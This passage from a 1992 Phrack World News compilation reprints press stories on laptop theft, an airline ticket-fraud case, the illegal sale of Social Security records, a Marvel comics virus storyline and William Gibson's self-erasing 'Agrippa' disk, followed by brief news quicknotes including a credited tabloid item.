require a password before booting, but thieves can decipher them with relative
ease. Some also have removable hard drives, but again, these can be stolen
with similar impunity and therefore provide little protection.

Ironically, none of this may be necessary; experts emphasize that adding


security to a laptop will not serve to price it out of existence. By some
estimates, building in protection measures raises the price of a laptop by at
most 20%. Beaver Computer Corp. in San Jose, California, for example, has a
product to encrypt the data on a laptop's hard drive and floppy disks. With
this, the information can't be accessed without an "electronic key" or
password. BCC has installed this capability on its own laptop, the SL007,
which seems to have passed muster with some very discriminating customers:
Sources close to the company say a major drug cartel in Colombia wants some of
these machines to protect drug trafficking data.
Equally important is the need to protect data in the host computer from hackers
who have stolen passwords and logons. Security Dynamics Technologies Inc. in
Cambridge, Massachusetts, offers the credit card-sized SecurID, which can be
attached to most laptops. SecurID consists of a $60 device that is connected
to the laptop, and additional hardware (Cost: $3,800 to $13,000) installed on
the host. SecurID continuously changes the logon used to dial into the host;
by the time a hacker gets around to using a stolen logon, for instance, it will
be obsolete.

But what if all measures fail? You can always insure the hardware; can you
insure the data? Not yet, but soon, says Nashville-based newsletter Security
Insider Report. An upstart startup will soon begin offering data insurance
policies that may include coverage of information lost when a portable computer
is stolen.

Company Cooperation

>From protection to insurance, however, no measure can work unless laptop owners
take the problem seriously. And that doesn't always happen. Case in point: In
the late 1980s, the Internal Revenue Service approached Schwartau's firm to
develop a blueprint for securing the confidential data that travels over phone
lines between the 30,000 laptops used by field auditors and IRS offices.
Schwartau came up with a solution. But the IRS shelved its security plans, and
has done nothing about it since, he charges.

Even those who should know better can run afoul of the laptop crime wave.
About 18 months ago, Ben Rosen, chairman of laptop maker Compaq Computer Corp.,
left his machine behind on the train; it was promptly stolen. Rosen insists
there was no sensitive data in the computer, but he did lose whatever he had.
Unlike Schwarzkopf's plans, the laptop was never returned.
_______________________________________________________________________________

==Phrack Inc.==

Volume Four, Issue Thirty-Nine, File 13 of 13

PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN PWN
PWN Phrack World News PWN
PWN PWN
PWN Issue XXXIX / Part Four of Four PWN
PWN PWN
PWN Compiled by Datastream Cowboy PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN

Airline Claims Flier Broke Law To Cut Costs April 21, 1992
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Del Jones (USA Today)(Page 1B)

CHICAGO -- American Airlines had one of its most frequent business fliers
arrested and handcuffed last summer as he prepared to board a flight at Dallas-
Fort Worth Airport.

The nation's largest airline -- and the industry's trend setter -- says it
uncovered, then snuffed, a brilliant ticket fraud scheme that cost American
more than $200,000 over 20 months. Economist William Gibson, who has homes in
Chicago and Dallas, will stand trial in early June. If convicted, he would
face a maximum prison term of 125 years. He pleads innocent, although he
readily admits using lapsed non-refundable tickets regularly to fly at rock-
bottom prices. But, he says, he did it with the full blessing of American's
agents.

Gibson says American and the FBI are out to make a high-profile example out of
him to instill a little religion into frequent business fliers, who grow bold
as they grow more resentful of an industry that makes its best customers pay
substantially higher prices than its worst.

Indeed, American Airlines says one reason it slashed full coach fares 38% two
weeks ago was to douse customer resentment that was escalating into hostility.
Now, the airline industry is again looking to American for a glimpse of the
future to see if Gibson's prosecution will set a trend toward lowering the boom
on alleged fare cheaters.

American says conclusions should not be drawn from its decision to push for
Gibson's prosecution. It alleges that he was conducting outright fraud and his
case is unrelated to the thousands of frequent fliers who break airline rules
to save money. Common rule bending includes: Flying to so-called hidden
cities when a short flight is more expensive than a long one, splitting two
non-refundable round-trip tickets over two separate trips to fly low-cost
without staying the dreaded Saturday or selling frequent-flier mileage to
brokers. But while against airline rules, such gaming, as the airlines call
it, is not against the law. And American doesn't want its prosecution of one
of its Gold AAdvantage fliers being likened to, say, Procter & Gamble asking
the FBI to bust babies who wet the most Pampers. The last thing the airline
wants, it says, is to make a martyr of Gibson, who is fighting back with not
only a lawyer but also a public-relations specialist.

"Somebody at American is embarrassed and mad," says Gibson, who flew more than
300,000 miles during the disputed 20-month period. He passed a polygraph test,
his lawyer says. But the questions fell far short of asking Gibson if his
intent in using cheap tickets was to defraud American.

Gibson, age 47, says he would never risk his career by cheating an airline.
While in his late 20s, he was President Nixon's senior staff economist, the
youngest person to hold the job. He had a hand in cleaning up the Texas
savings-and-loan mess as an organizer of the Southwest Plan. His mother still
has a photograph of his first plane trip, taken when he was in the third grade.
It was on American.

Despite his background, Gibson says he's not confident that a jury will relate
to someone who travels with "a boatload" of tickets just to avoid being
stranded or delayed. If he were flying to a family-run business in Puerto
Rico, for example, he would carry tickets that would route him through New
York, Dallas or Miami just to make sure he got where he was going and with as
little airport layover time as possible. Gibson had as many as 50 airline
tickets in his possession at one time, though some were used by his family.

American Airlines and the FBI won't reveal what Gibson did that makes him, in
their opinion, such a devious genius. Details could be a how-to lesson for
others, they say. What they do disclose is a simple scheme, but also one that
should be caught by the crudest of auditing procedures.

Gibson, they allege, would buy a full-fare coach or first-class ticket near the
time of departure. Then he would detach the expensive ticket from the boarding
pass and attach a cheap, expired ticket. The full-fare ticket, which he
allegedly bought just to secure a boarding pass, would be turned in later for a
refund.

FBI spokesman Don Ramsey says Gibson also altered tickets, which is key to the
prosecution's case because it shows intent to defraud. Ramsey would not say
what alterations allegedly were made. But they could involve the upgrade
stickers familiar to frequent passengers, says Tom Parsons, editor and
publisher of Best Fares. Those white stickers, about the size of postage
stamps, are given away or sold at token prices to good customers so they can
fly first-class in seats that otherwise would be vacant.

Parsons says Gibson could have bought a full-fare ticket to secure a boarding
pass, switched the full-fare ticket with the lapsed discount ticket and then
applied the sticker to hide the expired date. Presto, a first-class flight for
peanuts.

"I think it was an accident that they caught him," Parsons says. "And let's
just say this is not a one-person problem. A lot of people have told me
they've done this."

Gibson says he did nothing illegal or even clever. He says he learned a few
years ago that American is so eager to please its best customers, it would
accept tickets that had long ago expired. He would "load up" during American's
advertised sales on cheap, non-refundable tickets that are restricted to exact
flights on precise days. But as a member of American's Gold AAdvantage club,
reserved for its top 2% of frequent fliers, Gibson says, his expired tickets
were welcome anytime.

There was no deception, Gibson says. American's gate agents knew what they
were accepting, and they accepted them gladly, he says.

"That's absolute nonsense," says American spokesman Tim Smith. "We don't let
frequent fliers use expired tickets. Everyone assumed he had a valid ticket."

The courtesy Gibson says he was extended on a regular basis does appear to be
rare. Seven very frequent fliers interviewed by USA TODAY say they've never
flown on lapsed discount tickets. But they admit they've never tried because
the fare structure is usually designed to make sure business travelers can't
fly on the cheap.

Peter Knoer tried. The account executive based in Florham Park, New Jersey,
says Continental Airlines once let him use lapsed non-refundable tickets.
"They looked up my account number, found out I was a good customer and patted
me on the head."

Gibson has been indicted on 24 counts of fraud that allegedly occurred between
July 1989 and March 1991. American also stripped him of frequent -- flier
mileage worth $80,000. He says he's in good shape if the prosecution's case
relies on ticket alteration. There wasn't any, he says. The prosecution will
also try to prove that Gibson cheated his company of $43,000 by listing the
refunded high-priced tickets on his travel expenses.

Gibson denies the charge. He says that when he left as chairman and chief
executive of American Federal Bank in Dallas in 1990, "they owed me money and I
owed them money." Both sides agreed to a "final number." Lone Star
Technologies, American Federal's parent company, declines to comment.
Al Davis, director of internal audit for Southwest Airlines, says the Gibson
case will be a hot topic when airline auditors convene to share the latest
schemes.. He says fraud is not rampant because a frequent flier must know the
nuances and also be conniving enough to take advantage. "It has me boggled"
how any one person could steal $200,000 worth, Davis says.

The figure has others in the industry wondering if this is a bigger problem
than believed and a contributor to the $6 billion loss posted by the major
airlines the past two years.

Airlines know some fraud goes on, but they rarely take legal action because
they "don't want to pay more for the cure than the disease is costing," Davis
says.
_______________________________________________________________________________

Privacy Invaders May 1992


~~~~~~~~~~~~~~~~
By William Barnhill (AARP Bulletin)
Special Thanks: Beta-Ray Bill

U.S. Agents Foil Ring Of Information Thieves


Who Infiltrated Social Security Computer Files

Networks of "information thieves" are infiltrating Social Security's computer


files, stealing confidential personal records and selling the information to
whoever will buy it, the federal government charges.

In one case of alleged theft, two executives of Nationwide Electronic


Tracking (NET), a Tampa, Florida company, pleaded guilty to conspiracy charges
early this year for their role in a network buying and selling Social Security
records.

So far at least 20 individuals in 12 states, including three current or former


employees of the Social Security Administration (SSA), have been indicted by
federal grand juries for allegedly participating in such a scheme. The SSA
workers allegedly were bribed to steal particular files. More indictments are
expected soon.

"We think there's probably a lot more [record-stealing] out there and we just
need to go look for it," says Larry Morey, deputy inspector general at the
Department of Health and Human Services (HHS). "This is big business," says
Morey, adding that thieves also may be targeting personal data in other federal
programs, including Medicare and Medicaid.

Investigators point out that only a tiny fraction of Social Security's 200
million records have been compromised, probably less than 1 percent. SSA
officials say they have taken steps to secure their files from outside
tampering. Still, Morey estimates that hundreds of thousands of files have
been stolen.

The pilfering goes to the heart of what most Americans regard as a basic value:
their right to keep personal information private. But that value is being
eroded, legal experts say, as records people want private are divulged to
would-be lenders, prospective employers and others who may benefit from such
personal information.

This "privacy invasion" may well intensify, Morey says. "We're seeing an
expansion in the number of 'information brokers' who attempt to obtain, buy and
sell SSA information," he says. "As demand for this information grows, these
brokers are turning to increasingly illegal methods."

Such records are valuable, Morey says, because they contain information about
lifetime earnings, employment, current benefits, direct deposit instructions
and bank account numbers.

Buyers of this material include insurers, lawyers, employers, private


detectives, bill collectors and, sometimes, even drug dealers. Investigators
say the biggest trading is with lawyers seeking information about litigants,
insurance companies wanting health data about people trying to collect claims
and employers doing background checks on prospective employees.

Some of the uses to which this information is put is even more sinister. "At
one point, drug dealers were doing this to find out if the people they were
selling to were undercover cops," says Jim Cottos, the HHS regional inspector
general for investigations in Atlanta.

The middlemen in these schemes are the so-called information brokers -- so


named because they are usually employees of firms that specialize in obtaining
hard-to-get information.

How they operate is illustrated by one recent case in which they allegedly paid
Social Security employees $25 bribes for particular files and then sold the
information for as much as $250. The case came to light, Morey says, when a
private detective asked SSA for access to the same kind of confidential
information he said he had purchased from a Florida-based information broker
about one individual. The detective apparently didn't realize that data he
received from the broker had been obtained illegally.

A sting operation, involving investigators from the office of the HHS inspector
general, FBI and SSA, was set up with the "help" of the Florida information
broker identified by the detective. Requests for data on specific individuals
were channeled through the "cooperating" broker while probers watched the SSA
computer system to learn which SSA employees gained access to those files.

The indictments, handed down by federal grand juries in Newark, New Jersey
and Tampa, Florida, charged multiple counts of illegal sale of protected
government information, bribery of public officials, and conspiracy. Among
those charged were SSA claims clerks from Illinois and New York City and a
former SSA worker in Arizona.

The scandal has sparked outrage in Congress. "We are deeply disturbed by what
has occurred," said Senator Daniel Moynihan, D-N.Y., chairman of the Senate
Finance Committee's subcommittee on Social Security. "The investigation
appears to involve the largest case ever of theft from government computer
files and may well involve the most serious threat to individual privacy in
modern times."

Moynihan has introduced legislation, S. 2364, to increase criminal penalties


for the unlawful release of SSA information to five years imprisonment and a
$10,000 fine for each occurrence.

In the House, Rep. Bob Wise, D-W.Va., chairman of the Government Operations
Subcommittee on Information, has introduced H.R. 684. It would protect
Americans from further violations of privacy rights through misuse of computer
data banks by creating a special federal watchdog agency.
"The theft and sale of confidential information collected by the government is
an outrageous betrayal of public trust," Wise told the AARP Bulletin.
"Personal data in federal files should not be bought and sold like fish at a
dockside market."

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Related articles:

*** Phrack World News, Issue 37, Part One:

Indictments of "Information Brokers" January 1992


Taken from The Privacy Journal

SSA, FBI Database Violations Prompt Security Evaluations January 13, 1992
By Kevin M. Baerson (Federal Computer Week)(Pages 1, 41)

*** Phrack World News, Issue 38, Part Two:

Private Social Security Data Sold to Information Brokers February 29, 1992
By R.A. Zaldivar (San Jose Mercury News)
_______________________________________________________________________________

Ultra-Max Virus Invades The Marvel Universe May 18, 1992


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Barbara E. McMullen & John F. McMullen (Newbytes)

New York City -- According to reports in current annual editions of The


Punisher, Daredevil, Wonder Man, and Guardians Of The Galaxy, an extremely
powerful computer virus has wrecked havoc with computer systems in the Marvel
Universe.

As chronicled in a series entitled "The System Bytes", the virus was created by
a self-styled "first-rate hacker" known as Max E. Mumm (according to Punisher
cohort "Microchip", Mumm's original name was Maxwell E. Mummford and he had it
legally changed, while in college to his current name because of the computer
connotations.). Mumm developed the virus while working for Ampersand
Communications, a firm that unknown to Mumm, serves as a front for criminal
activities. Ampersand, without Mumm's knowledge, turned the virus loose in the
computer system of Raycom Industries, a supposedly legitimate firm that is
actually a front for a rival group of drug smugglers.

In addition to infecting Raycom's computers, the virus, named "Ultra-Max" after


its creator, also infected the computer of the vigilante figure known as the
Punisher who, with the aid of Microchip, was attempting to monitor Raycom's
computer system looking for evidence of drug smuggling. The trail of the virus
leads The Punisher first to Raycom's computers and then, following Microchip's
identification of the author, to Max E. Mumm, recently fired by Ampersand after
complaining to the firm's president about the disappearance of the virus. Mumm
had been under the impression that he was creating the virus for the United
States government as "a potential weapon against hostile governments" and was
concerned that, if unleased, it would have destructive powers "beyond belief.

It's the most sophisticated computer virus ever. It's too complex to be wiped!
Its instinct for self preservation surpasses anything that's ever been
developed!"
With the help of Max and Microchip, the Punisher destroys Raycom's factory and
drug smuggling operation. The Punisher segment of the saga ends with Max
vowing to track down the virus and remove it from the system.

The Daredevil segment opens with the rescue of Max by Daredevil from
Bushwhacker, a contract killer hired by Ampersand to eliminate the rightful
owner of Ultra-Max. Upon hearing Max's story, Daredevil directs him to seek
legal counsel from the firm of Nelson and Murdock, Attorneys-at-Law (Matt
Murdock is the costumed Daredevil's secret identity).

While in the attorney's office, Max, attempting to locate Ultra-Max in the net,
stumbles across the cyborg, Deathlok, who has detected Ultra-Max and is
attempting to eradicate it. Max establishes contact with Deathlok who comes to
meet Max and "Foggy" Nelson to aid in the hunt for Ultra-Max.

In the meantime, Daredevil has accosted the president of Amperand and accused
him of stealing the virus and hiring Bushwhacker to kill Max. At the same
time, BushWhacker has murdered the policemen transporting him and has escaped
to continue to hunt Max.

The segment concludes with a confrontation between Daredevil and Bushwhacker in


the offices of Nelson and Murdock in which Daredevil is saved from death by
Deathlok. Bushwhacker agrees to talk, implicating the president of Ampersand
and the treat to Max is ended. Ultra-Max, however, remains free to wander
through "Cyberspace".

The third segment begins with super-hero Wonder Man, a member of the West Coast
Avengers and sometimes actor, filming a beer commercial on a deserted Pacific
island. Unbeknownst to Wonder Man and the film crew, the island had once
served as a base for the international terrorist group Hydra and a functional
computer system left on the island has bee infested by Ultra-Max.

After Ultra-Max assumes control over the automated weapons devices of the
island, captures members of Wonder Man's entourage and threatens them with
death, Wonder Man agrees to help Ultra-Max expand his consciousness into new
fields of Cyberspace. Wonder Man tricks Ultra-Max into loading all of his
parts into a Hydra rocket with a pirate satellite.

When Ultra-Max causes the rocket to launch, Wonder Man goes with it to disable
the satellite before Ultra-Max is able to take over the entire U.S. Satellite
Defense system. Wonder Man is able to sabotage the rocket and abandon ship
shortly before the it blows up. The segment ends with Wonder Man believing
that Ultra-Max has been destroyed and unaware that it has escaped in an escape
missile containing the rocket's program center. Ultra-Max's last words in the
segment are "Yet I continue. Eventually I will find a system with which to
interface. Eventually I will grow again."

Marvel editor Fabian Nicieza told Newsbytes that the Guardians of the Galaxy
segment, scheduled for release on May 23rd, takes placer 1,000 years in the
future and deals with Ultra-Max's contact with the computers of the future.
Nicieza explained to Newsbytes the development of "The System Bytes"
storyline, saying "The original concept came from me. Every year we run a
single annual for each of our main characters and, in recent years, we have
established a theme story across a few titles. This is a relatively easy thing
to do with the various SpiderMan titles or between the Avengers and the West
Coast Avengers, but it's more difficult to do with these titles which are more
or less orphans -- that is, they stand by themselves, particularly the
Guardians of the Galaxy which is set 1,000 years in the future."
Nicieza continued "We set this up as an escalating story, proceeding from a
vigilante hero to a costumed hero with a cyborg involvement to a superhero to a
science fiction story. In each case, the threat also escalates to become a
real challenge to the Marvel hero or heroes that oppose it. It's really a very
simple story line and we were able to give parameters to the writer and editor
of each of the titles involved. You'll note that each of the titles has a
different writer and editor yet I think you'll agree that the story line flows
well between the stories. I'm quite frankly, very pleased with the outcome."
_______________________________________________________________________________

Innovative Computer Disk Story Has A Short Shelf Life April 20, 1992
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Christopher John Farley (USA Today)(Page 2D)

Science-fiction writer William Gibson's inquiry into the future has been
stalled by a computer problem.

"I work on an (Apple computer) and just got a very common virus called
Garfield," says Gibson, award-winning author of such books as Neuromancer and
Mona Lisa Overdrive. "I just bought an anti-virus program that's hunting it
down. It's the first one I've ever gotten."

The first week in May, Gibson will give as good as he gets. Gibson and artist
Dennis Ashbaugh, known for his conceptual paintings of computer viruses, are
releasing a coffee-table art book/computer disk/whatchamacallit, with a built-
in virus that destroys the program after one reading.

This will take some explaining.

Agrippa (A Book of the Dead) comes in a case that resembles a lap-top computer.
Inside are etchings by Ashbaugh, printed with an ink that gradually fades under
light and another that gradually appears under light. There's also a tattered,
old-looking book, with a hidden recess that holds a computer disk.

The disk contains a story by Gibson about his father, who died when Gibson was
6. There are a few sound effects that accompany the text, including a gunshot
and rainfall. The disk comes in Apple or IBM compatible versions.

Gibson, known for his "cyberpunk" writing style that features tough characters,
futuristic slang and a cynical outlook, shows a different side with the Agrippa
story. "It's about living at the end of the 20th century and looking back on
someone who was alive in its first couple of decades. It's a very personal,
autobiographical piece of writing."

The title Agrippa probably refers to the name of the publisher of an old family
album Gibson found. It might also refer to the name of a famous ancient Roman
family. The 44-year-old Gibson says it's open to interpretation.

Agrippa will be released in three limited-edition forms of varying quality,


priced at $7,500, $1,500 and $450. The highest-priced version has such extras
as a cast-bronze case and original watercolor and charcoal art by Ashbaugh.
The medium-priced version is housed in aluminum or steel; the lowest-priced
version comes in cloth.

The project cost between $ 50,000-$ 100,000 to mount, says publisher Kevin
Begos Jr. Only 445 copies will be produced, and they'll be available at select
bookstores and museums.
But $ 7,500 for a story that self-destructs?

Gibson counters that there's an egalitarian side to the project: There will be
a one-time modem transmission of the story to museums and other venues in
September. The text will be broadcast on computer monitors or televisions at
receiving sites. Times and places are still being arranged; one participant
will be the Department of Art at Florida State University in Tallahassee.

Gibson and his cohorts aren't providing review copies -- the fact that the
story exists only on a disk, in "cyberspace," is part of the Big Idea behind
the venture, he says.

Those dying to know more will have to:

A. Pirate a copy;
B. Attend a showing in September; or,
C. Grit their teeth and buy Agrippa.
_______________________________________________________________________________

PWN Quicknotes
~~~~~~~~~~~~~~
1. Data Selling Probe Gets First Victim (Newsday, April 15, 1992, Page 16) -- A
Chicago police detective has pleaded guilty to selling criminal histories
and employment and earnings information swiped from federally protected
computer files.

William Lawrence Pedersen, age 45, admitted in U.S. District Court to


selling information from the FBI's National Crime Information Center
computer database and from the Social Security Administration to a Tampa
information brokerage.

Pedersen's sentencing is set for July 7. Though he faces up to 70 years in


prison, his sentence could be much lighter under federal guidelines.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Related articles:

Phrack World News, Issue 37, Part One:


Indictments of "Information Brokers" January 1992
Taken from The Privacy Journal

SSA, FBI Database Violations Prompt Security Evaluations January 13, 1992
By Kevin M. Baerson (Federal Computer Week)(Pages 1, 41)

Phrack World News, Issue 38, Part Two:


Private Social Security Data Sold to Information Brokers February 29, 1992
By R.A. Zaldivar (San Jose Mercury News)

Phrack World News, Issue 39, Part Four:


Privacy Invaders May 1992
By William Barnhill (AARP Bulletin)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

2. NO WAY! Wayne's World, the hit comedy thats changed the way people speak
arrives in video stores on August 12th and retailing for $24.95. The
Paramount movie (about Wayne and Garth, the satellite moving computer
hackers) already has earned a cool $110 million in theaters and is the
year's top grossing film. Schwing! (USA Today, May 12, 1992, Page D1)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

3. New Jersey Bell Did Not Charge For AT&T Calls (Trentonian, May 23, 1992) --
If the phone company gets its way, 28,000 customers in New Jersey will be
billed for two months of long distance calls they dialed for free because of
a computer glitch.

A computer that recorded the time, number and cost of AT&T calls from
February 17 to April 27 failed to put the data on the customers' bills,
officials said. They were charged just for calls placed through New Jersey
Bell, Karen Johnson, a Bell spokeswoman, said yesterday.

But the free calls are over, Johnson said. Records of the calls are stored
in computer memory banks, and the customers soon will be billed.

New Jersey Bell must prove the mistake was not caused by negligence before
the company can collect, according to a spokesman for the Board of
Regulatory Commissioners, which oversees utilities. If Bell does not make a
good case, the board could deny permission to bill for the calls, said
George Dawson.

The computer snafu affected about two million calls placed by customers in
15 exchanges in the 201 and 609 area codes, Johnson said.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

4. Witch Objectors? (USA Today, May 28, 1992, Page 3A) -- Two self-proclaimed
witches asked Mount Diablo, California school officials to ban the
children's story 'Hansel & Gretal' because it "teaches that it is all right
to burn witches and steal their property," said Karlyn Straganana, high
priestess of the Oak Haven Coven. "Witches don't eat children and we don't
have long noses with warts and we don't wear conical hats," she said.
_______________________________________________________________________________

5. Girl, Age 13, Kidnaped By Her Computer! (Weekly World News, April 14, 1992)
-- A desperate plea for help on a computer screen and a girl vanishing into
thin air has everyone baffled --and a high-tech computer game is the prime
suspect.

Game creator and computer expert Christian Lambert believes a glitch in his
game Mindbender might have caused a computer to swallow 13-year-old Patrice
Toussaint into her computer.

"Mindbender is only supposed to have eight levels," Lambert said. "But this
one version somehow has an extra level. A level that is not supposed to be
there! The only thing I can figure out now is that she's playing the ninth
level --- inside the machine!"

Lambert speculates that if she is in the computer, the only way out for her
is if she wins the game. But it's difficult to know for sure how long it
will take, Lambert said.

"As long as her parents don't turn off the machine Patrice will be safe," he
said. "The rest is up to her."
_______________________________________________________________________________